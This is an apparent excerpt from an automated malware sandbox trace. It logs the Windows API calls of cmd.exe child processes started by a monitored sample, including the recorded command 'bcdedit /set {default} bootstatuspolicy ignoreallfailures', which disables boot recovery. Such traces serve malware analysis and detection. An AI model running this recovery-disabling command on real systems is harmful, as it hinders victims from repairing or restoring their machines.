[0094.184] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0094.184] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0094.184] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0094.184] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0094.184] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0094.184] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0094.184] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0094.184] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0094.184] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0094.184] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0094.184] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0094.184] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0094.184] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0094.185] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0094.185] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0094.185] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0094.185] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0094.185] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0094.185] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0094.185] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0094.185] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0094.186] GetProcessHeap () returned 0x7c0000 [0094.186] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x210) returned 0x7d30e0 [0094.186] GetProcessHeap () returned 0x7c0000 [0094.186] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x5e) returned 0x7d32f8 [0094.186] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0094.186] GetProcessHeap () returned 0x7c0000 [0094.186] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x418) returned 0x7c07f0 [0094.186] SetErrorMode (uMode=0x0) returned 0x0 [0094.186] SetErrorMode (uMode=0x1) returned 0x0 [0094.186] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7c07f8, lpFilePart=0x39f0f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f0f8*="Desktop") returned 0x25 [0094.186] SetErrorMode (uMode=0x0) returned 0x1 [0094.186] GetProcessHeap () returned 0x7c0000 [0094.187] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7c07f0, Size=0x64) returned 0x7c07f0 [0094.187] GetProcessHeap () returned 0x7c0000 [0094.187] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7c07f0) returned 0x64 [0094.187] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.187] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.187] GetProcessHeap () returned 0x7c0000 [0094.187] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x120) returned 0x7d3360 [0094.187] GetProcessHeap () returned 0x7c0000 [0094.187] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x238) returned 0x7c0860 [0094.470] GetProcessHeap () returned 0x7c0000 [0094.471] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7c0860, Size=0x122) returned 0x7c0860 [0094.471] GetProcessHeap () returned 0x7c0000 [0094.471] RtlSizeHeap (HeapHandle=0x7c0000, Flags=0x0, MemoryPointer=0x7c0860) returned 0x122 [0094.471] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.471] GetProcessHeap () returned 0x7c0000 [0094.471] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xe0) returned 0x7d3488 [0094.479] _get_osfhandle (_FileHandle=2) returned 0xb [0094.479] GetFileType (hFile=0xb) returned 0x2 [0094.479] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0094.479] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x39f2c8 | out: lpMode=0x39f2c8) returned 1 [0094.480] _get_osfhandle (_FileHandle=2) returned 0xb [0094.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x39f2fc | out: lpConsoleScreenBufferInfo=0x39f2fc) returned 1 [0094.480] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0094.481] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x39f320, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x39f320*=0x62) returned 1 [0094.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0094.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0094.483] SetConsoleInputExeNameW () returned 0x1 [0094.483] GetConsoleOutputCP () returned 0x1b5 [0094.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0094.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.484] exit (_Code=1) Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x27800000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0xb4c [0085.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf924 | out: lpSystemTimeAsFileTime=0x1cf924*(dwLowDateTime=0x212a75a0, dwHighDateTime=0x1d62227)) [0085.801] GetCurrentProcessId () returned 0xa94 [0085.801] GetCurrentThreadId () returned 0xb4c [0085.801] GetTickCount () returned 0x114c5cf [0085.801] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf91c | out: lpPerformanceCount=0x1cf91c*=20575678472) returned 1 [0085.803] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0085.803] __set_app_type (_Type=0x1) [0085.803] __p__fmode () returned 0x770331f4 [0085.803] __p__commode () returned 0x770331fc [0085.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0085.804] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0085.804] GetCurrentThreadId () returned 0xb4c [0085.804] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb4c) returned 0x60 [0085.804] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.804] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0085.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.805] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf8b4 | out: phkResult=0x1cf8b4*=0x0) returned 0x2 [0085.805] VirtualQuery (in: lpAddress=0x1cf8eb, lpBuffer=0x1cf884, dwLength=0x1c | out: lpBuffer=0x1cf884*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0085.805] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf884, dwLength=0x1c | out: lpBuffer=0x1cf884*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0085.805] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf884, dwLength=0x1c | out: lpBuffer=0x1cf884*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0085.805] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf884, dwLength=0x1c | out: lpBuffer=0x1cf884*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0085.805] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf884, dwLength=0x1c | out: lpBuffer=0x1cf884*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0085.805] GetConsoleOutputCP () returned 0x1b5 [0085.806] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0085.806] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0085.806] _get_osfhandle (_FileHandle=1) returned 0x7 [0085.806] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0085.806] _get_osfhandle (_FileHandle=1) returned 0x7 [0085.806] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0085.807] _get_osfhandle (_FileHandle=1) returned 0x7 [0085.807] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0085.807] _get_osfhandle (_FileHandle=0) returned 0x3 [0085.807] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0085.808] _get_osfhandle (_FileHandle=0) returned 0x3 [0085.808] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0085.808] GetEnvironmentStringsW () returned 0x5e2058* [0085.808] GetProcessHeap () returned 0x5d0000 [0085.808] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e2b30 [0085.809] FreeEnvironmentStringsW (penv=0x5e2058) returned 1 [0085.809] GetProcessHeap () returned 0x5d0000 [0085.809] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e0c90 [0085.809] GetEnvironmentStringsW () returned 0x5e2058* [0085.809] GetProcessHeap () returned 0x5d0000 [0085.809] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e3608 [0085.809] FreeEnvironmentStringsW (penv=0x5e2058) returned 1 [0085.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce824 | out: phkResult=0x1ce824*=0x68) returned 0x0 [0085.809] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x0, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x1, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x1, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x0, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x40, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x40, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.810] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x40, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.810] RegCloseKey (hKey=0x68) returned 0x0 [0085.810] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce824 | out: phkResult=0x1ce824*=0x68) returned 0x0 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x40, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x1, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x1, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x0, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x9, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x4, lpData=0x1ce830*=0x9, lpcbData=0x1ce828*=0x4) returned 0x0 [0085.811] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce82c, lpData=0x1ce830, lpcbData=0x1ce828*=0x1000 | out: lpType=0x1ce82c*=0x0, lpData=0x1ce830*=0x9, lpcbData=0x1ce828*=0x1000) returned 0x2 [0085.811] RegCloseKey (hKey=0x68) returned 0x0 [0085.811] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb0320a [0085.811] srand (_Seed=0x5eb0320a) [0085.811] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0085.811] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0085.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0085.812] GetProcessHeap () returned 0x5d0000 [0085.812] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e2058 [0085.812] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0085.813] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.813] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0085.813] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0085.813] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0085.813] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0085.813] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0085.813] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0085.813] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0085.813] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0085.813] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0085.813] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0085.813] GetProcessHeap () returned 0x5d0000 [0085.813] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2b30 | out: hHeap=0x5d0000) returned 1 [0085.813] GetEnvironmentStringsW () returned 0x5e2270* [0085.813] GetProcessHeap () returned 0x5d0000 [0085.813] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xae2) returned 0x5e4bd0 [0085.814] FreeEnvironmentStringsW (penv=0x5e2270) returned 1 [0085.814] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0085.814] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0085.814] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0085.814] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0085.814] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0085.814] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0085.814] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0085.814] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0085.814] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0085.814] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0085.814] GetProcessHeap () returned 0x5d0000 [0085.814] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e56c0 [0085.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf5f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0085.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf5f0, lpFilePart=0x1cf5ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf5ec*="Desktop") returned 0x25 [0085.814] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0085.815] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf36c | out: lpFindFileData=0x1cf36c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e1ed8 [0085.815] FindClose (in: hFindFile=0x5e1ed8 | out: hFindFile=0x5e1ed8) returned 1 [0085.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf36c | out: lpFindFileData=0x1cf36c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e1ed8 [0085.815] FindClose (in: hFindFile=0x5e1ed8 | out: hFindFile=0x5e1ed8) returned 1 [0085.815] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0085.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf36c | out: lpFindFileData=0x1cf36c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1fdad3c0, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1fdad3c0, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e1ed8 [0085.815] FindClose (in: hFindFile=0x5e1ed8 | out: hFindFile=0x5e1ed8) returned 1 [0085.815] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0085.815] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0085.815] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0085.816] GetProcessHeap () returned 0x5d0000 [0085.816] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4bd0 | out: hHeap=0x5d0000) returned 1 [0085.816] GetEnvironmentStringsW () returned 0x5e40e0* [0085.816] GetProcessHeap () returned 0x5d0000 [0085.816] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e5f20 [0085.816] FreeEnvironmentStringsW (penv=0x5e40e0) returned 1 [0085.816] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0085.816] GetProcessHeap () returned 0x5d0000 [0085.816] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e56c0 | out: hHeap=0x5d0000) returned 1 [0085.816] GetProcessHeap () returned 0x5d0000 [0085.816] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e6a60 [0085.816] GetProcessHeap () returned 0x5d0000 [0085.816] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x80) returned 0x5e2db0 [0085.817] GetProcessHeap () returned 0x5d0000 [0085.817] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a60 | out: hHeap=0x5d0000) returned 1 [0085.817] GetConsoleOutputCP () returned 0x1b5 [0085.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0085.817] GetUserDefaultLCID () returned 0x409 [0085.818] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf730, cchData=128 | out: lpLCData="0") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf730, cchData=128 | out: lpLCData="0") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf730, cchData=128 | out: lpLCData="1") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0085.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0085.834] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0085.836] GetProcessHeap () returned 0x5d0000 [0085.836] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2e38 [0085.836] GetConsoleTitleW (in: lpConsoleTitle=0x5e2e38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0085.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.836] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0085.837] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0085.837] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0085.837] GetProcessHeap () returned 0x5d0000 [0085.837] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e6a60 [0085.837] GetProcessHeap () returned 0x5d0000 [0085.837] HeapFree (in: 